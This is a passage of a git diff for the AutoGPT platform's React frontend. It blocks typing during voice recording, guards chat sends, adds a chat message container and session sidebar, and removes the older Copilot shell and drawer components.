@@ -60,6 +62,15 @@ export function ChatInput({
    inputId,
  });

+  // Block text changes when recording
+  const handleChange = useCallback(
+    (e: ChangeEvent<HTMLTextAreaElement>) => {
+      if (isRecording) return;
+      baseHandleChange(e);
+    },
+    [isRecording, baseHandleChange],
+  );
+
  return (
    <form onSubmit={handleSubmit} className={cn("relative flex-1", className)}>
      <div className="relative">
--- a/autogpt_platform/frontend/src/components/contextual/Chat/components/ChatInput/components/AudioWaveform.tsx
+++ b/autogpt_platform/frontend/src/components/contextual/Chat/components/ChatInput/components/AudioWaveform.tsx
--- a/autogpt_platform/frontend/src/components/contextual/Chat/components/ChatInput/components/RecordingIndicator.tsx
+++ b/autogpt_platform/frontend/src/components/contextual/Chat/components/ChatInput/components/RecordingIndicator.tsx
--- a/autogpt_platform/frontend/src/components/contextual/Chat/components/ChatInput/helpers.ts
+++ b/autogpt_platform/frontend/src/components/contextual/Chat/components/ChatInput/helpers.ts
--- a/autogpt_platform/frontend/src/components/contextual/Chat/components/ChatInput/useChatInput.ts
+++ b/autogpt_platform/frontend/src/components/contextual/Chat/components/ChatInput/useChatInput.ts
@@ -21,6 +21,7 @@ export function useChatInput({
 }: Args) {
  const [value, setValue] = useState("");
  const [hasMultipleLines, setHasMultipleLines] = useState(false);
+  const [isSending, setIsSending] = useState(false);

  useEffect(
    function focusOnMount() {
@@ -100,34 +101,40 @@ export function useChatInput({
    }
  }, [value, maxRows, inputId]);

-  const handleSend = () => {
-    if (disabled || !value.trim()) return;
-    onSend(value.trim());
-    setValue("");
-    setHasMultipleLines(false);
-    const textarea = document.getElementById(inputId) as HTMLTextAreaElement;
-    const wrapper = document.getElementById(
-      `${inputId}-wrapper`,
-    ) as HTMLDivElement;
-    if (textarea) {
-      textarea.style.height = "auto";
+  async function handleSend() {
+    if (disabled || isSending || !value.trim()) return;
+
+    setIsSending(true);
+    try {
+      await onSend(value.trim());
+      setValue("");
+      setHasMultipleLines(false);
+      const textarea = document.getElementById(inputId) as HTMLTextAreaElement;
+      const wrapper = document.getElementById(
+        `${inputId}-wrapper`,
+      ) as HTMLDivElement;
+      if (textarea) {
+        textarea.style.height = "auto";
+      }
+      if (wrapper) {
+        wrapper.style.height = "";
+        wrapper.style.maxHeight = "";
+      }
+    } finally {
+      setIsSending(false);
    }
-    if (wrapper) {
-      wrapper.style.height = "";
-      wrapper.style.maxHeight = "";
-    }
-  };
+  }

  function handleKeyDown(event: KeyboardEvent<HTMLTextAreaElement>) {
    if (event.key === "Enter" && !event.shiftKey) {
      event.preventDefault();
-      handleSend();
+      void handleSend();
    }
  }

  function handleSubmit(e: FormEvent<HTMLFormElement>) {
    e.preventDefault();
-    handleSend();
+    void handleSend();
  }

  function handleChange(e: ChangeEvent<HTMLTextAreaElement>) {
@@ -142,5 +149,6 @@ export function useChatInput({
    handleSubmit,
    handleChange,
    hasMultipleLines,
+    isSending,
  };
 }
--- a/autogpt_platform/frontend/src/components/contextual/Chat/components/ChatInput/useVoiceRecording.ts
+++ b/autogpt_platform/frontend/src/components/contextual/Chat/components/ChatInput/useVoiceRecording.ts
@@ -38,9 +38,13 @@ export function useVoiceRecording({
  const streamRef = useRef<MediaStream | null>(null);
  const isRecordingRef = useRef(false);

-  const isSupported =
-    typeof window !== "undefined" &&
-    !!(navigator.mediaDevices && navigator.mediaDevices.getUserMedia);
+  const [isSupported, setIsSupported] = useState(false);
+
+  useEffect(() => {
+    setIsSupported(
+      !!(navigator.mediaDevices && navigator.mediaDevices.getUserMedia),
+    );
+  }, []);

  const clearTimer = useCallback(() => {
    if (timerRef.current) {
@@ -214,17 +218,33 @@ export function useVoiceRecording({

  const handleKeyDown = useCallback(
    (event: KeyboardEvent<HTMLTextAreaElement>) => {
-      if (event.key === " " && !value.trim() && !isTranscribing) {
+      // Allow space to toggle recording (start when empty, stop when recording)
+      if (event.key === " " && !isTranscribing) {
+        if (isRecordingRef.current) {
+          // Stop recording on space
+          event.preventDefault();
+          stopRecording();
+          return;
+        } else if (!value.trim()) {
+          // Start recording on space when input is empty
+          event.preventDefault();
+          void startRecording();
+          return;
+        }
+      }
+      // Block all key events when recording (except space handled above)
+      if (isRecordingRef.current) {
        event.preventDefault();
-        toggleRecording();
        return;
      }
      baseHandleKeyDown(event);
    },
-    [value, isTranscribing, toggleRecording, baseHandleKeyDown],
+    [value, isTranscribing, stopRecording, startRecording, baseHandleKeyDown],
  );

  const showMicButton = isSupported;
+  // Don't include isRecording in disabled state - we need key events to work
+  // Text input is blocked via handleKeyDown instead
  const isInputDisabled = disabled || isStreaming || isTranscribing;

  // Cleanup on unmount
--- a/autogpt_platform/frontend/src/app/(platform)/copilot/components/ChatMessagesContainer/ChatMessagesContainer.tsx
+++ b/autogpt_platform/frontend/src/app/(platform)/copilot/components/ChatMessagesContainer/ChatMessagesContainer.tsx
@@ -0,0 +1,305 @@
+import { getGetWorkspaceDownloadFileByIdUrl } from "@/app/api/__generated__/endpoints/workspace/workspace";
+import {
+  Conversation,
+  ConversationContent,
+  ConversationScrollButton,
+} from "@/components/ai-elements/conversation";
+import {
+  Message,
+  MessageContent,
+  MessageResponse,
+} from "@/components/ai-elements/message";
+import { LoadingSpinner } from "@/components/atoms/LoadingSpinner/LoadingSpinner";
+import { toast } from "@/components/molecules/Toast/use-toast";
+import { ToolUIPart, UIDataTypes, UIMessage, UITools } from "ai";
+import { useEffect, useRef, useState } from "react";
+import { CreateAgentTool } from "../../tools/CreateAgent/CreateAgent";
+import { EditAgentTool } from "../../tools/EditAgent/EditAgent";
+import { FindAgentsTool } from "../../tools/FindAgents/FindAgents";
+import { FindBlocksTool } from "../../tools/FindBlocks/FindBlocks";
+import { RunAgentTool } from "../../tools/RunAgent/RunAgent";
+import { RunBlockTool } from "../../tools/RunBlock/RunBlock";
+import { SearchDocsTool } from "../../tools/SearchDocs/SearchDocs";
+import { GenericTool } from "../../tools/GenericTool/GenericTool";
+import { ViewAgentOutputTool } from "../../tools/ViewAgentOutput/ViewAgentOutput";
+
+// ---------------------------------------------------------------------------
+// Workspace media support
+// ---------------------------------------------------------------------------
+
+/**
+ * Resolve workspace:// URLs in markdown text to proxy download URLs.
+ * Detects MIME type from the hash fragment (e.g. workspace://id#video/mp4)
+ * and prefixes the alt text with "video:" so the custom img component can
+ * render a <video> element instead.
+ */
+function resolveWorkspaceUrls(text: string): string {
+  return text.replace(
+    /!\[([^\]]*)\]\(workspace:\/\/([^)#\s]+)(?:#([^)\s]*))?\)/g,
+    (_match, alt: string, fileId: string, mimeHint?: string) => {
+      const apiPath = getGetWorkspaceDownloadFileByIdUrl(fileId);
+      const url = `/api/proxy${apiPath}`;
+      if (mimeHint?.startsWith("video/")) {
+        return `![video:${alt || "Video"}](${url})`;
+      }
+      return `![${alt || "Image"}](${url})`;
+    },
+  );
+}
+
+/**
+ * Custom img component for Streamdown that renders <video> elements
+ * for workspace video files (detected via "video:" alt-text prefix).
+ * Falls back to <video> when an <img> fails to load for workspace files.
+ */
+function WorkspaceMediaImage(props: React.JSX.IntrinsicElements["img"]) {
+  const { src, alt, ...rest } = props;
+  const [imgFailed, setImgFailed] = useState(false);
+  const isWorkspace = src?.includes("/workspace/files/") ?? false;
+
+  if (!src) return null;
+
+  if (alt?.startsWith("video:") || (imgFailed && isWorkspace)) {
+    return (
+      <span className="my-2 inline-block">
+        <video
+          controls
+          className="h-auto max-w-full rounded-md border border-zinc-200"
+          preload="metadata"
+        >
+          <source src={src} />
+          Your browser does not support the video tag.
+        </video>
+      </span>
+    );
+  }
+
+  return (
+    // eslint-disable-next-line @next/next/no-img-element
+    <img
+      src={src}
+      alt={alt || "Image"}
+      className="h-auto max-w-full rounded-md border border-zinc-200"
+      loading="lazy"
+      onError={() => {
+        if (isWorkspace) setImgFailed(true);
+      }}
+      {...rest}
+    />
+  );
+}
+
+/** Stable components override for Streamdown (avoids re-creating on every render). */
+const STREAMDOWN_COMPONENTS = { img: WorkspaceMediaImage };
+
+const THINKING_PHRASES = [
+  "Thinking...",
+  "Considering this...",
+  "Working through this...",
+  "Analyzing your request...",
+  "Reasoning...",
+  "Looking into it...",
+  "Processing your request...",
+  "Mulling this over...",
+  "Piecing it together...",
+  "On it...",
+];
+
+function getRandomPhrase() {
+  return THINKING_PHRASES[Math.floor(Math.random() * THINKING_PHRASES.length)];
+}
+
+interface ChatMessagesContainerProps {
+  messages: UIMessage<unknown, UIDataTypes, UITools>[];
+  status: string;
+  error: Error | undefined;
+  isLoading: boolean;
+}
+
+export const ChatMessagesContainer = ({
+  messages,
+  status,
+  error,
+  isLoading,
+}: ChatMessagesContainerProps) => {
+  const [thinkingPhrase, setThinkingPhrase] = useState(getRandomPhrase);
+  const lastToastTimeRef = useRef(0);
+
+  useEffect(() => {
+    if (status === "submitted") {
+      setThinkingPhrase(getRandomPhrase());
+    }
+  }, [status]);
+
+  // Show a toast when a new error occurs, debounced to avoid spam
+  useEffect(() => {
+    if (!error) return;
+    const now = Date.now();
+    if (now - lastToastTimeRef.current < 3_000) return;
+    lastToastTimeRef.current = now;
+    toast({
+      variant: "destructive",
+      title: "Something went wrong",
+      description:
+        "The assistant encountered an error. Please try sending your message again.",
+    });
+  }, [error]);
+
+  const lastMessage = messages[messages.length - 1];
+  const lastAssistantHasVisibleContent =
+    lastMessage?.role === "assistant" &&
+    lastMessage.parts.some(
+      (p) =>
+        (p.type === "text" && p.text.trim().length > 0) ||
+        p.type.startsWith("tool-"),
+    );
+
+  const showThinking =
+    status === "submitted" ||
+    (status === "streaming" && !lastAssistantHasVisibleContent);
+
+  return (
+    <Conversation className="min-h-0 flex-1">
+      <ConversationContent className="flex min-h-screen flex-1 flex-col gap-6 px-3 py-6">
+        {isLoading && messages.length === 0 && (
+          <div className="flex min-h-full flex-1 items-center justify-center">
+            <LoadingSpinner className="text-neutral-600" />
+          </div>
+        )}
+        {messages.map((message, messageIndex) => {
+          const isLastAssistant =
+            messageIndex === messages.length - 1 &&
+            message.role === "assistant";
+          const messageHasVisibleContent = message.parts.some(
+            (p) =>
+              (p.type === "text" && p.text.trim().length > 0) ||
+              p.type.startsWith("tool-"),
+          );
+
+          return (
+            <Message from={message.role} key={message.id}>
+              <MessageContent
+                className={
+                  "text-[1rem] leading-relaxed " +
+                  "group-[.is-user]:rounded-xl group-[.is-user]:bg-purple-100 group-[.is-user]:px-3 group-[.is-user]:py-2.5 group-[.is-user]:text-slate-900 group-[.is-user]:[border-bottom-right-radius:0] " +
+                  "group-[.is-assistant]:bg-transparent group-[.is-assistant]:text-slate-900"
+                }
+              >
+                {message.parts.map((part, i) => {
+                  switch (part.type) {
+                    case "text":
+                      return (
+                        <MessageResponse
+                          key={`${message.id}-${i}`}
+                          components={STREAMDOWN_COMPONENTS}
+                        >
+                          {resolveWorkspaceUrls(part.text)}
+                        </MessageResponse>
+                      );
+                    case "tool-find_block":
+                      return (
+                        <FindBlocksTool
+                          key={`${message.id}-${i}`}
+                          part={part as ToolUIPart}
+                        />
+                      );
+                    case "tool-find_agent":
+                    case "tool-find_library_agent":
+                      return (
+                        <FindAgentsTool
+                          key={`${message.id}-${i}`}
+                          part={part as ToolUIPart}
+                        />
+                      );
+                    case "tool-search_docs":
+                    case "tool-get_doc_page":
+                      return (
+                        <SearchDocsTool
+                          key={`${message.id}-${i}`}
+                          part={part as ToolUIPart}
+                        />
+                      );
+                    case "tool-run_block":
+                      return (
+                        <RunBlockTool
+                          key={`${message.id}-${i}`}
+                          part={part as ToolUIPart}
+                        />
+                      );
+                    case "tool-run_agent":
+                    case "tool-schedule_agent":
+                      return (
+                        <RunAgentTool
+                          key={`${message.id}-${i}`}
+                          part={part as ToolUIPart}
+                        />
+                      );
+                    case "tool-create_agent":
+                      return (
+                        <CreateAgentTool
+                          key={`${message.id}-${i}`}
+                          part={part as ToolUIPart}
+                        />
+                      );
+                    case "tool-edit_agent":
+                      return (
+                        <EditAgentTool
+                          key={`${message.id}-${i}`}
+                          part={part as ToolUIPart}
+                        />
+                      );
+                    case "tool-view_agent_output":
+                      return (
+                        <ViewAgentOutputTool
+                          key={`${message.id}-${i}`}
+                          part={part as ToolUIPart}
+                        />
+                      );
+                    default:
+                      // Render a generic tool indicator for SDK built-in
+                      // tools (Read, Glob, Grep, etc.) or any unrecognized tool
+                      if (part.type.startsWith("tool-")) {
+                        return (
+                          <GenericTool
+                            key={`${message.id}-${i}`}
+                            part={part as ToolUIPart}
+                          />
+                        );
+                      }
+                      return null;
+                  }
+                })}
+                {isLastAssistant &&
+                  !messageHasVisibleContent &&
+                  showThinking && (
+                    <span className="inline-block animate-shimmer bg-gradient-to-r from-neutral-400 via-neutral-600 to-neutral-400 bg-[length:200%_100%] bg-clip-text text-transparent">
+                      {thinkingPhrase}
+                    </span>
+                  )}
+              </MessageContent>
+            </Message>
+          );
+        })}
+        {showThinking && lastMessage?.role !== "assistant" && (
+          <Message from="assistant">
+            <MessageContent className="text-[1rem] leading-relaxed">
+              <span className="inline-block animate-shimmer bg-gradient-to-r from-neutral-400 via-neutral-600 to-neutral-400 bg-[length:200%_100%] bg-clip-text text-transparent">
+                {thinkingPhrase}
+              </span>
+            </MessageContent>
+          </Message>
+        )}
+        {error && (
+          <div className="rounded-lg bg-red-50 p-4 text-sm text-red-700">
+            <p className="font-medium">Something went wrong</p>
+            <p className="mt-1 text-red-600">
+              The assistant encountered an error. Please try sending your
+              message again.
+            </p>
+          </div>
+        )}
+      </ConversationContent>
+      <ConversationScrollButton />
+    </Conversation>
+  );
+};
--- a/autogpt_platform/frontend/src/app/(platform)/copilot/components/ChatSidebar/ChatSidebar.tsx
+++ b/autogpt_platform/frontend/src/app/(platform)/copilot/components/ChatSidebar/ChatSidebar.tsx
@@ -0,0 +1,188 @@
+"use client";
+import { useGetV2ListSessions } from "@/app/api/__generated__/endpoints/chat/chat";
+import { Button } from "@/components/atoms/Button/Button";
+import { LoadingSpinner } from "@/components/atoms/LoadingSpinner/LoadingSpinner";
+import { Text } from "@/components/atoms/Text/Text";
+import {
+  Sidebar,
+  SidebarContent,
+  SidebarFooter,
+  SidebarHeader,
+  SidebarTrigger,
+  useSidebar,
+} from "@/components/ui/sidebar";
+import { cn } from "@/lib/utils";
+import { PlusCircleIcon, PlusIcon } from "@phosphor-icons/react";
+import { motion } from "framer-motion";
+import { parseAsString, useQueryState } from "nuqs";
+
+export function ChatSidebar() {
+  const { state } = useSidebar();
+  const isCollapsed = state === "collapsed";
+  const [sessionId, setSessionId] = useQueryState("sessionId", parseAsString);
+
+  const { data: sessionsResponse, isLoading: isLoadingSessions } =
+    useGetV2ListSessions({ limit: 50 });
+
+  const sessions =
+    sessionsResponse?.status === 200 ? sessionsResponse.data.sessions : [];
+
+  function handleNewChat() {
+    setSessionId(null);
+  }
+
+  function handleSelectSession(id: string) {
+    setSessionId(id);
+  }
+
+  function formatDate(dateString: string) {
+    const date = new Date(dateString);
+    const now = new Date();
+    const diffMs = now.getTime() - date.getTime();
+    const diffDays = Math.floor(diffMs / (1000 * 60 * 60 * 24));
+
+    if (diffDays === 0) return "Today";
+    if (diffDays === 1) return "Yesterday";
+    if (diffDays < 7) return `${diffDays} days ago`;
+
+    const day = date.getDate();
+    const ordinal =
+      day % 10 === 1 && day !== 11
+        ? "st"
+        : day % 10 === 2 && day !== 12
+          ? "nd"
+          : day % 10 === 3 && day !== 13
+            ? "rd"
+            : "th";
+    const month = date.toLocaleDateString("en-US", { month: "short" });
+    const year = date.getFullYear();
+
+    return `${day}${ordinal} ${month} ${year}`;
+  }
+
+  return (
+    <Sidebar
+      variant="inset"
+      collapsible="icon"
+      className="!top-[50px] !h-[calc(100vh-50px)] border-r border-zinc-100 px-0"
+    >
+      {isCollapsed && (
+        <SidebarHeader
+          className={cn(
+            "flex",
+            isCollapsed
+              ? "flex-row items-center justify-between gap-y-4 md:flex-col md:items-start md:justify-start"
+              : "flex-row items-center justify-between",
+          )}
+        >
+          <motion.div
+            key={isCollapsed ? "header-collapsed" : "header-expanded"}
+            className="flex flex-col items-center gap-3 pt-4"
+            initial={{ opacity: 0, filter: "blur(3px)" }}
+            animate={{ opacity: 1, filter: "blur(0px)" }}
+            transition={{ type: "spring", bounce: 0.2 }}
+          >
+            <div className="flex flex-col items-center gap-2">
+              <SidebarTrigger />
+              <Button
+                variant="ghost"
+                onClick={handleNewChat}
+                style={{ minWidth: "auto", width: "auto" }}
+              >
+                <PlusCircleIcon className="!size-5" />
+                <span className="sr-only">New Chat</span>
+              </Button>
+            </div>
+          </motion.div>
+        </SidebarHeader>
+      )}
+      <SidebarContent className="gap-4 overflow-y-auto px-4 py-4 [-ms-overflow-style:none] [scrollbar-width:none] [&::-webkit-scrollbar]:hidden">
+        {!isCollapsed && (
+          <motion.div
+            initial={{ opacity: 0 }}
+            animate={{ opacity: 1 }}
+            transition={{ duration: 0.2, delay: 0.1 }}
+            className="flex items-center justify-between px-3"
+          >
+            <Text variant="h3" size="body-medium">
+              Your chats
+            </Text>
+            <div className="relative left-6">
+              <SidebarTrigger />
+            </div>
+          </motion.div>
+        )}
+
+        {!isCollapsed && (
+          <motion.div
+            initial={{ opacity: 0 }}
+            animate={{ opacity: 1 }}
+            transition={{ duration: 0.2, delay: 0.15 }}
+            className="mt-4 flex flex-col gap-1"
+          >
+            {isLoadingSessions ? (
+              <div className="flex min-h-[30rem] items-center justify-center py-4">
+                <LoadingSpinner size="small" className="text-neutral-600" />
+              </div>
+            ) : sessions.length === 0 ? (
+              <p className="py-4 text-center text-sm text-neutral-500">
+                No conversations yet
+              </p>
+            ) : (
+              sessions.map((session) => (
+                <button
+                  key={session.id}
+                  onClick={() => handleSelectSession(session.id)}
+                  className={cn(
+                    "w-full rounded-lg px-3 py-2.5 text-left transition-colors",
+                    session.id === sessionId
+                      ? "bg-zinc-100"
+                      : "hover:bg-zinc-50",
+                  )}
+                >
+                  <div className="flex min-w-0 max-w-full flex-col overflow-hidden">
+                    <div className="min-w-0 max-w-full">
+                      <Text
+                        variant="body"
+                        className={cn(
+                          "truncate font-normal",
+                          session.id === sessionId
+                            ? "text-zinc-600"
+                            : "text-zinc-800",
+                        )}
+                      >
+                        {session.title || `Untitled chat`}
+                      </Text>
+                    </div>
+                    <Text variant="small" className="text-neutral-400">
+                      {formatDate(session.updated_at)}
+                    </Text>
+                  </div>
+                </button>
+              ))
+            )}
+          </motion.div>
+        )}
+      </SidebarContent>
+      {!isCollapsed && sessionId && (
+        <SidebarFooter className="shrink-0 bg-zinc-50 p-3 pb-1 shadow-[0_-4px_6px_-1px_rgba(0,0,0,0.05)]">
+          <motion.div
+            initial={{ opacity: 0 }}
+            animate={{ opacity: 1 }}
+            transition={{ duration: 0.2, delay: 0.2 }}
+          >
+            <Button
+              variant="primary"
+              size="small"
+              onClick={handleNewChat}
+              className="w-full"
+              leftIcon={<PlusIcon className="h-4 w-4" weight="bold" />}
+            >
+              New Chat
+            </Button>
+          </motion.div>
+        </SidebarFooter>
+      )}
+    </Sidebar>
+  );
+}
--- a/autogpt_platform/frontend/src/app/(platform)/copilot/components/CopilotChatActionsProvider/CopilotChatActionsProvider.tsx
+++ b/autogpt_platform/frontend/src/app/(platform)/copilot/components/CopilotChatActionsProvider/CopilotChatActionsProvider.tsx
@@ -0,0 +1,16 @@
+"use client";
+
+import { CopilotChatActionsContext } from "./useCopilotChatActions";
+
+interface Props {
+  onSend: (message: string) => void | Promise<void>;
+  children: React.ReactNode;
+}
+
+export function CopilotChatActionsProvider({ onSend, children }: Props) {
+  return (
+    <CopilotChatActionsContext.Provider value={{ onSend }}>
+      {children}
+    </CopilotChatActionsContext.Provider>
+  );
+}
--- a/autogpt_platform/frontend/src/app/(platform)/copilot/components/CopilotChatActionsProvider/useCopilotChatActions.ts
+++ b/autogpt_platform/frontend/src/app/(platform)/copilot/components/CopilotChatActionsProvider/useCopilotChatActions.ts
@@ -0,0 +1,23 @@
+"use client";
+
+import { createContext, useContext } from "react";
+
+interface CopilotChatActions {
+  onSend: (message: string) => void | Promise<void>;
+}
+
+const CopilotChatActionsContext = createContext<CopilotChatActions | null>(
+  null,
+);
+
+export function useCopilotChatActions(): CopilotChatActions {
+  const ctx = useContext(CopilotChatActionsContext);
+  if (!ctx) {
+    throw new Error(
+      "useCopilotChatActions must be used within CopilotChatActionsProvider",
+    );
+  }
+  return ctx;
+}
+
+export { CopilotChatActionsContext };
--- a/autogpt_platform/frontend/src/app/(platform)/copilot/components/CopilotShell/CopilotShell.tsx
+++ b/autogpt_platform/frontend/src/app/(platform)/copilot/components/CopilotShell/CopilotShell.tsx
@@ -1,99 +0,0 @@
-"use client";
-
-import { ChatLoader } from "@/components/contextual/Chat/components/ChatLoader/ChatLoader";
-import { Text } from "@/components/atoms/Text/Text";
-import { NAVBAR_HEIGHT_PX } from "@/lib/constants";
-import type { ReactNode } from "react";
-import { DesktopSidebar } from "./components/DesktopSidebar/DesktopSidebar";
-import { MobileDrawer } from "./components/MobileDrawer/MobileDrawer";
-import { MobileHeader } from "./components/MobileHeader/MobileHeader";
-import { useCopilotShell } from "./useCopilotShell";
-
-interface Props {
-  children: ReactNode;
-}
-
-export function CopilotShell({ children }: Props) {
-  const {
-    isMobile,
-    isDrawerOpen,
-    isLoading,
-    isCreatingSession,
-    isLoggedIn,
-    hasActiveSession,
-    sessions,
-    currentSessionId,
-    handleOpenDrawer,
-    handleCloseDrawer,
-    handleDrawerOpenChange,
-    handleNewChatClick,
-    handleSessionClick,
-    hasNextPage,
-    isFetchingNextPage,
-    fetchNextPage,
-  } = useCopilotShell();
-
-  if (!isLoggedIn) {
-    return (
-      <div className="flex h-full items-center justify-center">
-        <ChatLoader />
-      </div>
-    );
-  }
-
-  return (
-    <div
-      className="flex overflow-hidden bg-[#EFEFF0]"
-      style={{ height: `calc(100vh - ${NAVBAR_HEIGHT_PX}px)` }}
-    >
-      {!isMobile && (
-        <DesktopSidebar
-          sessions={sessions}
-          currentSessionId={currentSessionId}
-          isLoading={isLoading}
-          hasNextPage={hasNextPage}
-          isFetchingNextPage={isFetchingNextPage}
-          onSelectSession={handleSessionClick}
-          onFetchNextPage={fetchNextPage}
-          onNewChat={handleNewChatClick}
-          hasActiveSession={Boolean(hasActiveSession)}
-        />
-      )}
-
-      <div className="relative flex min-h-0 flex-1 flex-col">
-        {isMobile && <MobileHeader onOpenDrawer={handleOpenDrawer} />}
-        <div className="flex min-h-0 flex-1 flex-col">
-          {isCreatingSession ? (
-            <div className="flex h-full flex-1 flex-col items-center justify-center bg-[#f8f8f9]">
-              <div className="flex flex-col items-center gap-4">
-                <ChatLoader />
-                <Text variant="body" className="text-zinc-500">
-                  Creating your chat...
-                </Text>
-              </div>
-            </div>
-          ) : (
-            children
-          )}
-        </div>
-      </div>
-
-      {isMobile && (
-        <MobileDrawer
-          isOpen={isDrawerOpen}
-          sessions={sessions}
-          currentSessionId={currentSessionId}
-          isLoading={isLoading}
-          hasNextPage={hasNextPage}
-          isFetchingNextPage={isFetchingNextPage}
-          onSelectSession={handleSessionClick}
-          onFetchNextPage={fetchNextPage}
-          onNewChat={handleNewChatClick}
-          onClose={handleCloseDrawer}
-          onOpenChange={handleDrawerOpenChange}
-          hasActiveSession={Boolean(hasActiveSession)}
-        />
-      )}
-    </div>
-  );
-}
--- a/autogpt_platform/frontend/src/app/(platform)/copilot/components/CopilotShell/components/DesktopSidebar/DesktopSidebar.tsx
+++ b/autogpt_platform/frontend/src/app/(platform)/copilot/components/CopilotShell/components/DesktopSidebar/DesktopSidebar.tsx
@@ -1,70 +0,0 @@
-import type { SessionSummaryResponse } from "@/app/api/__generated__/models/sessionSummaryResponse";
-import { Button } from "@/components/atoms/Button/Button";
-import { Text } from "@/components/atoms/Text/Text";
-import { scrollbarStyles } from "@/components/styles/scrollbars";
-import { cn } from "@/lib/utils";
-import { Plus } from "@phosphor-icons/react";
-import { SessionsList } from "../SessionsList/SessionsList";
-
-interface Props {
-  sessions: SessionSummaryResponse[];
-  currentSessionId: string | null;
-  isLoading: boolean;
-  hasNextPage: boolean;
-  isFetchingNextPage: boolean;
-  onSelectSession: (sessionId: string) => void;
-  onFetchNextPage: () => void;
-  onNewChat: () => void;
-  hasActiveSession: boolean;
-}
-
-export function DesktopSidebar({
-  sessions,
-  currentSessionId,
-  isLoading,
-  hasNextPage,
-  isFetchingNextPage,
-  onSelectSession,
-  onFetchNextPage,
-  onNewChat,
-  hasActiveSession,
-}: Props) {
-  return (
-    <aside className="flex h-full w-80 flex-col border-r border-zinc-100 bg-zinc-50">
-      <div className="shrink-0 px-6 py-4">
-        <Text variant="h3" size="body-medium">
-          Your chats
-        </Text>
-      </div>
-      <div
-        className={cn(
-          "flex min-h-0 flex-1 flex-col overflow-y-auto px-3 py-3",
-          scrollbarStyles,
-        )}
-      >
-        <SessionsList
-          sessions={sessions}
-          currentSessionId={currentSessionId}
-          isLoading={isLoading}
-          hasNextPage={hasNextPage}
-          isFetchingNextPage={isFetchingNextPage}
-          onSelectSession={onSelectSession}
-          onFetchNextPage={onFetchNextPage}
-        />
-      </div>
-      {hasActiveSession && (
-        <div className="shrink-0 bg-zinc-50 p-3 shadow-[0_-4px_6px_-1px_rgba(0,0,0,0.05)]">
-          <Button
-            variant="primary"
-            size="small"
-            onClick={onNewChat}
-            className="w-full"
-            leftIcon={<Plus width="1rem" height="1rem" />}
-          >
-            New Chat
-          </Button>
-        </div>
-      )}
-    </aside>
-  );
-}
--- a/autogpt_platform/frontend/src/app/(platform)/copilot/components/CopilotShell/components/MobileDrawer/MobileDrawer.tsx
+++ b/autogpt_platform/frontend/src/app/(platform)/copilot/components/CopilotShell/components/MobileDrawer/MobileDrawer.tsx
@@ -1,91 +0,0 @@
-import type { SessionSummaryResponse } from "@/app/api/__generated__/models/sessionSummaryResponse";
-import { Button } from "@/components/atoms/Button/Button";
-import { scrollbarStyles } from "@/components/styles/scrollbars";
-import { cn } from "@/lib/utils";
-import { PlusIcon, X } from "@phosphor-icons/react";
-import { Drawer } from "vaul";
-import { SessionsList } from "../SessionsList/SessionsList";
-
-interface Props {
-  isOpen: boolean;
-  sessions: SessionSummaryResponse[];
-  currentSessionId: string | null;
-  isLoading: boolean;
-  hasNextPage: boolean;
-  isFetchingNextPage: boolean;
-  onSelectSession: (sessionId: string) => void;
-  onFetchNextPage: () => void;
-  onNewChat: () => void;
-  onClose: () => void;
-  onOpenChange: (open: boolean) => void;
-  hasActiveSession: boolean;
-}
-
-export function MobileDrawer({
-  isOpen,
-  sessions,
-  currentSessionId,
-  isLoading,
-  hasNextPage,
-  isFetchingNextPage,
-  onSelectSession,
-  onFetchNextPage,
-  onNewChat,
-  onClose,
-  onOpenChange,
-  hasActiveSession,
-}: Props) {
-  return (
-    <Drawer.Root open={isOpen} onOpenChange={onOpenChange} direction="left">
-      <Drawer.Portal>
-        <Drawer.Overlay className="fixed inset-0 z-[60] bg-black/10 backdrop-blur-sm" />
-        <Drawer.Content className="fixed left-0 top-0 z-[70] flex h-full w-80 flex-col border-r border-zinc-200 bg-zinc-50">
-          <div className="shrink-0 border-b border-zinc-200 p-4">
-            <div className="flex items-center justify-between">
-              <Drawer.Title className="text-lg font-semibold text-zinc-800">
-                Your chats
-              </Drawer.Title>
-              <Button
-                variant="icon"
-                size="icon"
-                aria-label="Close sessions"
-                onClick={onClose}
-              >
-                <X width="1.25rem" height="1.25rem" />
-              </Button>
-            </div>
-          </div>
-          <div
-            className={cn(
-              "flex min-h-0 flex-1 flex-col overflow-y-auto px-3 py-3",
-              scrollbarStyles,
-            )}
-          >
-            <SessionsList
-              sessions={sessions}
-              currentSessionId={currentSessionId}
-              isLoading={isLoading}
-              hasNextPage={hasNextPage}
-              isFetchingNextPage={isFetchingNextPage}
-              onSelectSession={onSelectSession}
-              onFetchNextPage={onFetchNextPage}
-            />
-          </div>
-          {hasActiveSession && (
-            <div className="shrink-0 bg-white p-3 shadow-[0_-4px_6px_-1px_rgba(0,0,0,0.05)]">
-              <Button
-                variant="primary"
-                size="small"
-                onClick={onNewChat}
-                className="w-full"
-                leftIcon={<PlusIcon width="1rem" height="1rem" />}
-              >
-                New Chat
-              </Button>
-            </div>
-          )}
-        </Drawer.Content>
-      </Drawer.Portal>
-    </Drawer.Root>
-  );
-}
--- a/autogpt_platform/frontend/src/app/(platform)/copilot/components/CopilotShell/components/MobileDrawer/useMobileDrawer.ts
+++ b/autogpt_platform/frontend/src/app/(platform)/copilot/components/CopilotShell/components/MobileDrawer/useMobileDrawer.ts
@@ -1,24 +0,0 @@
-import { useState } from "react";
-
-export function useMobileDrawer() {
-  const [isDrawerOpen, setIsDrawerOpen] = useState(false);
-
-  const handleOpenDrawer = () => {
-    setIsDrawerOpen(true);
-  };
-
-  const handleCloseDrawer = () => {
-    setIsDrawerOpen(false);
-  };
-
-  const handleDrawerOpenChange = (open: boolean) => {
-    setIsDrawerOpen(open);
-  };
-
-  return {
-    isDrawerOpen,
-    handleOpenDrawer,
-    handleCloseDrawer,
-    handleDrawerOpenChange,
-  };
-}
--- a/autogpt_platform/frontend/src/app/(platform)/copilot/components/CopilotShell/components/SessionsList/SessionsList.tsx
+++ b/autogpt_platform/frontend/src/app/(platform)/copilot/components/CopilotShell/components/SessionsList/SessionsList.tsx
@@ -1,80 +0,0 @@
-import type { SessionSummaryResponse } from "@/app/api/__generated__/models/sessionSummaryResponse";
-import { Skeleton } from "@/components/__legacy__/ui/skeleton";
-import { Text } from "@/components/atoms/Text/Text";
-import { InfiniteList } from "@/components/molecules/InfiniteList/InfiniteList";
-import { cn } from "@/lib/utils";
-import { getSessionTitle } from "../../helpers";
-
-interface Props {
-  sessions: SessionSummaryResponse[];
-  currentSessionId: string | null;
-  isLoading: boolean;
-  hasNextPage: boolean;
-  isFetchingNextPage: boolean;
